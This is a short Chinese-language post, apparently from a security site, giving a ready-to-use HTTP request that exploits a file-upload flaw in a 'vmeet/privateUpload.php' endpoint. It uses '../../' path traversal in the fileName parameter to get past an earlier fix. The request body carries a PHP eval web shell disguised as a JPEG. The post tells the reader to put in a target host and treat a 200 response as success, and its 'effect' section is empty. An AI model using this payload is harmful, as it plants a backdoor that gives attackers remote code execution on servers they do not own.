JAVA安全网描述:
将一下playload在抓包的时候粘贴,host修改目标地址,之前乌云很多人只知道上传,修复之后就不可以了
但是../../可以转到二级目录依旧可以成功。
PS:返回200才能成功
playload:
POST /general/vmeet/privateUpload.php?fileName=../../upload.php+ HTTP/1.1
Host: %s
Proxy-Connection: keep-alive
Content-Length: 216
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryNwKj3xvHABLIBZ0A
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=9dfe93a1460440b70671e02e6d56dee0; ASP.NET_SessionId=nlxeowqes0yagtztlq5mgx45; tongji=1; referer=
——WebKitFormBoundaryNwKj3xvHABLIBZ0A
Content-Disposition: form-data; name=“Filedata”; filename=“2.jpg”
Content-Type: image/jpeg
<?php @eval($_POST['muma']);?>
——WebKitFormBoundaryNwKj3xvHABLIBZ0A–
效果:
